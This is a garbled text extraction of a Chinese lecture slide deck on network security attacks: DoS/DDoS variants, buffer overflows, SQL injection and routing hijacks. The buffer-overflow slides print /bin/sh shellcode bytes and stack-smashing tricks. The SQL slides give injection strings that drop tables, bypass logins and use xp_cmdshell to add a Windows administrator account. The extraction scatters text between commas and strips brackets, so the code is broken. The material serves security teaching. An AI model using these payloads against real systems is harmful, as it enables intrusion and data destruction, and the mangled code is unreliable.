S07-网络安全攻击

,37,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,网络协议,&,网络安全,S07,网络安全攻击,1,主要知识点,缺陷攻击方法,拒绝服务攻击,缓存溢出攻击,注入攻击方法,劫持攻击方法,拒绝服务攻击,Denial of Service,，,DoS,使系统或网络过载，使之无法继续提供正常服务的安全攻击,特点：,利用协议的特点或系统的漏洞,攻击者不必事先获得对系统的控制权，也不是为了获取访问权,类型：,带宽损耗型（,bandwidth consumption,）,因大量占用系统（例如一个网站）的网络带宽，导致受害者系统无法向其客户提供正常服务,资源匮乏型（,resource starvation,）,使目标服务器因宕机或没有足够资源（如内存）而失去网络服务能力（无法正常建立连接、响应请求、传输数据等）,分布式拒绝服务攻击,Distributed DoS,，,DDoS,DoS,攻击是攻击者系统与受害者系统拼资源、拼性能的过程，攻击者如果没有足够带宽和计算能力，就无法耗尽攻击对象的系统资源，,DDoS,攻击可在同一时间调用大量不同位置的计算机向同一目标实施攻击,DDoS攻击类型,DDoS,三种技术类型：,（,1,）利用协议漏洞,Syn Flood,Smurf,Fake IP,（,2,）利用软件缺陷,TearDrop,Ping-of-Death,Land,ICMP Fragment,（,3,）进行资源比拼,ICMP Flood,UDP Flood,E-mail Bomb,Syn Flood攻击,同步洪水攻击,也称为,TCP,同步攻击、三次握手攻击、半连接攻击,技术原理：,基于,TCP,建立连接所用的三次握手机制，故意缺少第三步的,ACK,回复，使被叫方计算机的连接一直处于占用资源的等待状态，直到计时器超时释放，如果同时存在大量的半连接，计算机就会耗尽系统资源，无法为正常业务提供服务,改进：,使用不同,IP,地址，使接收方难以甄别不正常流量,大量的,SYN,几乎同时从傀儡机群发出，在连接等待计时器超时前突破系统资源上限,Land攻击,登陆攻击,对,Syn Flood,攻击的改进,技术原理：,把,SYN,报文的源和目的,IP,地址均设置为被攻击者的,IP,地址，使之向自己回复,SYN-ACK,和,ACK,报文，可能由此建立起自环的空连接，占用更长时间和更多资源,SYN(IP,1,IP,1,),SYN(IP,1,IP,1,),SYN-ACK(IP,1,IP,1,),SYN-ACK(IP,1,IP,1,),SYN-ACK(IP,1,IP,1,),ACK(IP,1,IP,1,),IP,1,ACK(IP,1,IP,1,),ACK(IP,1,IP,1,),Ping of Death攻击,死亡回显攻击,利用,ICMP,服务端协议机实现的缺陷实施,DoS,攻击,技术原理：,假定某操作系统规定,ICMP,报文最大尺寸不超过,64KB,，却不进行严格检查，攻击者故意发送超过,64KB,上限的畸形,ping,报文（基于,ICMP,回显功能），主机就会出现性质严重的内存分配错误，导致崩溃、死机,向目标主机长时间、连续性、大批量地发送,ICMP,报文，将形成,ICMP,风暴，使主机耗费大量的计算资源，疲于奔命,Smurf攻击,Smurf,回显攻击,死亡回显,攻击,的一种变化,技术原理：,向一个拥有大量主机的内部子网发送欺骗性,ping,报文，目的,IP,地址设为该子网广播地址，而源,IP,地址设为子网内被攻击主机的地址,早期版本的某些型号路由器接收到该,ICMP,报文后予以转发,所有主机收到报文后进行,echo,，结果目标主机将同时收到大量,ICMP,报文,反复使用,Smurf,攻击，可能使子网因广播风暴而瘫痪,Fraggle,攻击,与,Smurf,类似，使用,UDP,的,echo,UDP Flood攻击,UDP,洪水攻击,死亡回显,攻击,的变化,之一,技术原理：,攻击者随机地向被攻击系统的端口发送,UDP,数据报文,当目标系统接收到一个,UDP,数据报文，会根据目的端口号试图确定正在等待（侦听）中的应用程序，如果发现应用程序并不存在，就根据报文中源,IP,地址回复一个,ICMP,报文，报告“目的地址无法连接”,如果向目标主机的随机端口不断发送随机端口号的,UDP,报文，在忙于处理这些垃圾数据报文的过程中，主机性能不断下降，直到不能提供正常服务,UDP Flood攻击改进,UDP,的,chargen,和,echo,服务,：,chargen,服务用于测试目的,（,character,generator,），端口,号,19,，可对任何接收到的,UDP,报文反馈随机生成的,字符,echo,服务端口号为,7,，可,对任何接收到的数据原样原路返回,Tear Drop攻击,泪滴攻击,利用某些,TCP/IP,实现中分段重组的进程的潜在弱点实施的,DoS,攻击，属于利用协议机缺陷进行的畸形消息攻击技术,技术原理,在,TCP/IP,协议栈实现中，总是假定可以信任,IP,报文的控制头所包含的信息,某些,TCP/IP,协议机（存在于一些操作系统相关版本中）一旦收到含有重叠偏移量的分段数据，会无法处理而崩溃,攻击者据此篡改或恶意设计,IP,报头，形成错误偏移量指针（,offset,值错位），发送给目标主机，引起主机宕机而终止服务,E-mail Bomb攻击,电子邮件炸弹攻击,主要针对电子邮件服务器系统,实施的,DoS,攻击,技术原理：,在同一时间内调用大量电子邮件服务器对同一个目标发送巨量电子邮件，使得该电子邮件服务器无法正常对外服务，或因超出其处理能力而崩溃,Fake IP攻击,IP,欺骗攻击,利用虚假,IP,报文（如伪造,IP,地址或其他字段、伪造,IP,承载的,TCP/UDP,报文）实施的,DoS,攻击,，,也是其他攻击方法的组成部分之一,技术原理：,利用,TCP,的,RST,位来实现,假定有一个合法用户（,IP,地址为,A,）已经同服务器建立了正常的连接，攻击者构造,TCP,报文，把,IP,源地址设定为,A,，向服务器发送一个带有,RST,置位的,TCP,报文，使服务器误解而释放已有连接，合法用户发送数据就因服务器失去连接而无法成功，不得不重新建立连接,为提升攻击效果，端口号应设置为服务器的重点应用，例如,Web,服务器的,80,端口,攻击者可伪造大量的,IP,地址（例如该网段的所有主机地址），向目标主机发送,TCP,（,RST,置位）报文，使服务器无法对合法用户进行正常服务,缓存溢出攻击,Buffer Overflow,故意使核心代码的缓冲区发生溢出，进而接管操作系统的,root,控制权限（如莫里斯蠕虫）,缓冲区溢出错误是一种非常普遍、非常隐蔽，也非常危险的漏洞，程序代码不能完全（直接）反映缓冲区溢出错误，在各种操作系统、应用软件中广泛存在,如今大约,80%,的安全事件与溢出攻击有关,基本技术原理：,在软件技术上，如果对缓冲区的边界控制不严格，甚至不加以控制，一旦越界，会使数据覆盖其他数据区域，引起不可预料的错误,数据出错,运行代码被破坏,栈内寄存器被破坏,形参和实参被破坏,栈内返回地址错误,操作系统运行程序的典型缓存结构,void func(arg1,arg2,argn),local-var1;,local-var2;, ,local-vark;,; program, ,危险函数实例,void copy8(char * str),char buf8;,strcpy(buf, str);,printf(“%sn”,buf);,main( ),copy8(“dangrous”);,main( ),copy8(“safe-string”);,“safe-string”,返回地址,Return Addr,EBP,buf8=,safe-str,EBP,ESP,进栈,ing,例：存在安全漏洞的系统函数strcpy( ),缓存溢出示例,C,源程序：,x,打印输出是什么？,void main( ) ,int x;,x = 0;,pass(1, 2, 3);,x = 1;,printf(%d,x,);,int pass(int a, int b, int c) ,char buffer16;,int sum;,int *ret;,ret = buffer + 20;,(*ret) += 10;,sum = a + b + c;,return sum;,缓存溢出示例分析,C,源程序：,void main( ) ,int x;,x = 0;,pass(1, 2, 3);,x = 1;,printf(%d,x);,int pass(int a, int b, int c) ,char buffer16;,int sum;,int *ret;,ret = buffer + 20;,(*ret) += 10;,sum = a + b + c;,return sum;,汇编,被跳过的指令,被跳过的指令,缓存溢出的利用,具有低权限的用户,执行程序,恢复原有权限,可能的方法一：,在程序执行的过程中，,把目标程序“植入”高权限区域，,再跳转到目标程序并执行。,可能的方法二：,在操作系统未恢复用户权限时，,改变正常运行过程，,跳转到目标程序并执行。,获取高级用户甚至超级用户权限,从而完全控制目标主机,正常流程,Trick,：程序调用的“库函数”即系统函数通常具有系统最高权限。,操作系统Shell技术含义,OS,用户,shell,用户,shell,命令控制台,可层次嵌套,继承前一层权限,Shell溢出攻击,准备,#include ,void main(),char *name2;,name0 = /bin/sh;,name1 = NULL;,execve(name0,name,NULL);,exit(0);,0x80482c7 :jmp,0x80482e8 ,0x80482c9 :pop,%esi,0x80482ca :mov,%esi,0x8(%esi),0x80482cd :xor,%eax,%eax,0x80482cf :mov,%al,0x7(%esi),0x80482d2 :mov,%eax,0xc(%esi),0x80482d5 :mov,$0xb,%al,0x80482d7 :mov,%esi,%ebx,0x80482d9 :lea,0x8(%esi),%ecx,0x80482dc :lea,0xc(%esi),%edx,0x80482df :int,$0x80,0x80482e1 :xor,%ebx,%ebx,0x80482e3 :mov,%ebx,%eax,0x80482e5 :inc,%eax,0x80482e6 :int,$0x80,0x80482e8 :call,0x80482c9 ,0x80482ed :,.string “/bin/sh”,char shellcode =,0x80482c7:0xeb 0x,2,f 0x5e 0x89 0x76 0x08 0x31 0xc0,0x80482cf:0x88 0x46 0x07 0x89 0x46 0x0c 0xb0 0x0b,0x80482d7:0x89 0xf3 0x8d 0x4e 0x08 0x8d 0x56 0x0c,0x80482df:0xcd 0x80 0x31 0xdb 0x89 0xd8 0x40 0xcd,0x80482e7:0x80 0xe8 0xdc 0xff 0xff 0xff,/b,0x80482ff:in/sh,（该程序功能为执行,name,指定,的命令行命令；本例为打开新,的,shell,）,Shell溢出攻击,代码,目标：拷贝完成后，“,buffer,地址”正好填充进栈内的“返回地址”位置,思考：为何用,strcpy(),而,非直接复制？,Shell溢出攻击,技巧,要求：, 攻击代码为连续的；, 地址指向攻击代码起始位置；, 地址恰好覆盖“返回地址”。,技巧：, 多个代码起始地址，提高命中率；, 代码以空指令开始，提高命中率；, 尝试不同的组合结构，适应不同的栈结构。,注入攻击,Injection Attack,在网络应用系统用户访问界面（例如浏览器）上输入事先严密设计的内容（恶意代码），并达到攻击目的,注入攻击往往针对,SQL,（,Structured Query Language,，结构化查询语言）数据库存取操作，因此常称为,SQL,注入攻击,数据库是网络信息系统的核心，如果数据库系统受到攻击，不论是引起数据泄漏，还是数据遭到篡改、伪造、删除，对系统而言影响必然是最致命的,技术原理：,数据库访问采用,SQL,语句实现数据表单、数据字段的存取操作,部分,SQL,语句在逻辑上是正确的，但在网络环境中却可能被人利用，成为系统安全的漏洞,数据库访问系统结构,Internet,客户端软件访问,浏览器访问,客户端软件指定访问方式，不可修改,URL,或脚本编程访问方式，存在修改可能,应用服务器,和,数据库,应用服务器,和,数据库,Web,服务器,用户终端,SQL查询操作实例,var CityName;,CityName = Request.form (CityName);,var sql = ,select * from OrdersTable where CityName = , +,CityName,+ ,;,若,CityName,输入,Shanghai,select * from OrdersTable where CityName = Shanghai ,（查询订单数据表,OrdersTable,中所有有关,Shanghai,的记录）,SQL注入攻击实例,var CityName;,CityName = Request.form (CityName);,var sql = ,select * from OrdersTable where CityName = , +,CityName,+ ,;,若,CityName,输入,Shanghai ; drop table OrdersTable - -,select * from OrdersTable where CityName = ,Shanghai ; drop table OrdersTable - -,分号（,;,）表示一个操作的结束和另一个操作的开始；,双连字符（,-,）指示当前行余下的部分是注释内容，应该忽略,数据库,将,首先检索出,OrdersTable,中,有关,Shanghai,的所有记录，然后将执行,drop table,命令，,即执行,删除,OrdersTable,数据表,！,SQL查询操作实例,Select * from users where username=,username.Text, and password=,password.Text,输入,username,和,password,可用以验证用户合法性,SQL注入攻击实例,Select * from users where username=,username.Text, and password=,password.Text,若,username,输入,or 1 = 1 -,Select * from users where username=,or 1 = 1 - -, and password=,anything,由,于,1=1,恒成立，,不论,password,输入什么，,用户验证总是得到通过！,SQL查询操作实例,Web,访问中，常用,访问方式如：,为,带参数的,ASP,动态网页，参数有一个或多个，可为整型或字符串型,相关,SQL,语句,如：,select * from,表名,where,字段,=XX,SQL注入攻击实例,user,为,SQL,数据库内置变量，为当前连接的用户的用户名,user,类型为,nvarchar,（不同于,int,类型）,user,与整数型（,int,）的,0,相比较，系统将尝试把,user,转换为,int,user,转换必定出错，则报错,将,nvarchar,值“,abc,”转换为,int,时发生语法错误！,由此获取到当前连接的用户的用户名“,abc,”！,变化,获取数据库名：,49; and user0,1; and db_name()0,若为“,sa,”则,为超级用户！,SQL注入攻击实例,;,exec master.xp_cmdshell “net user,name password,/add”,- -,执行存储过程,xp_cmdshell,以调用系统命令,net,，新建了,name,和,password,的账号！,;,exec master.xp_cmdshell “net localgroup,name,administrators /add”,- -,将新建的账号,name,加入管理员组！,劫持攻击,Kidnaping Attack,攻击者通过插入网络通信系统，改变原有的数据流（路由）并截取数据，达到窃取信息或篡改信息的目的,典型劫持攻击方法：,中间人攻击,黑洞攻击,虫洞攻击,Middle-man攻击,中间人攻击,劫持攻击的一种，攻击者隔离通信双方，每一方传递的信息都被中间人截取，而双方都以为来自中间人的信息是另一方发送,中间人攻击通常结合其他手段综合运用,技术原理：,在点对点通信方式下，中间人采用断开通信信道，将自身插入其间的方法，截留报文，并仿冒一方与另一方通信,在网络多点通信方式下，中间人则采取更加多样化的手段,分别骗取双方信任再进行仿冒通信（如利用公钥验证系统）,伪造,IP,地址或,MAC,地址,扰乱并窃取路由,篡改,DNS,服务,破解,VPN,专网,Blackhole攻击,黑洞攻击,劫持攻击的一种技术，主要存在于,Ad-hoc,网络中,攻击者使网络中所有结点的报文都发往恶意的黑洞结点,技术原理：,黑洞结点首先接入,Ad-hoc,网络，运行与其他正常结点相同的链路层、网络层和路由协议,当黑洞结点与其他结点交换路由信息时，加入经过设计的可以影响路由选择的信息，这些信息往往是虚假的“可用信道”,其他结点在路由信息中记录了这些虚假可选路径，建立路由表,当一个结点需要转发数据报文时，按路由发往黑洞结点，报文被丢弃,黑洞攻击变化：,Sybil,攻击,攻击者扮演不同结点的角色，如伪造或仿冒其他结点的,MAC,地址，以不同身份出现，达到干扰正常路由建立的目的,Rushing,攻击,采用抢先响应手段来阻止正常结点的通信,Wormhole攻击,虫洞攻击,劫持攻击的一种，以干扰和劫持,Ad-hoc,路由为目标,技术原理：,由两个以上的恶意结点合谋，共同发动攻击,两个处于不同位置的虫洞结点相互协作，一个虫洞结点把收到的路由信息经由专用的信道传给另一个虫洞结点，另一个也把收到的路由信息直接传过来，虽然两个虫洞结点相距甚远，却假装相邻,经过两个虫洞结点掺假的路由信息，计算得到的跳跃数将有很大的机会比正常路径的跳跃数短，则其它结点的数据报文就会交给虫洞结点转发，结果被丢弃,